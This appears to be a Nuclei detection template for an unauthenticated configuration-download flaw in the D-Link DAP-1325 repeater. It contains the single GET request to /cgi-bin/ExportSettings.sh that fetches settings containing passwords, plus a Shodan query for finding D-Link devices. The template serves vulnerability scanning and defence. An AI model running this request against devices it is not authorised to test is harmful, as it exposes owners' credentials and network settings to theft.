40 lines
1.2 KiB
YAML
40 lines
1.2 KiB
YAML
id: dlink-config-dump
|
|
|
|
info:
|
|
name: D-Link DAP-1325 - Information Disclosure
|
|
author: gy741
|
|
severity: critical
|
|
description: |
|
|
Security vulnerability known as Unauthenticated access to settings or Unauthenticated configuration download. This vulnerability occurs when a device, such as a repeater, allows the download of user settings without requiring proper authentication.
|
|
reference:
|
|
- https://www.exploit-db.com/exploits/51556
|
|
- https://www.dropbox.com/s/eqz0ntlzqp5472l/DAP-1325.mp4?dl=0
|
|
metadata:
|
|
max-request: 1
|
|
shodan-query: title:"D-LINK"
|
|
tags: misconfig,config,dump,dlink,auth-bypass,disclosure
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/cgi-bin/ExportSettings.sh"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "Password"
|
|
case-insensitive: true
|
|
|
|
- type: regex
|
|
part: header
|
|
regex:
|
|
- 'filename="(.*)_Settings.dat'
|
|
- 'application/octet-stream'
|
|
condition: and
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220081883ce530a394c3dc11bd8c95936455f943aff1a15d85d9a18bfd058bdf1e602201a7b6d69707942ff6580267e96fa59305ec62a124751db16e526d4764a6f9855:922c64590222798bb761d5b6d8e72950 |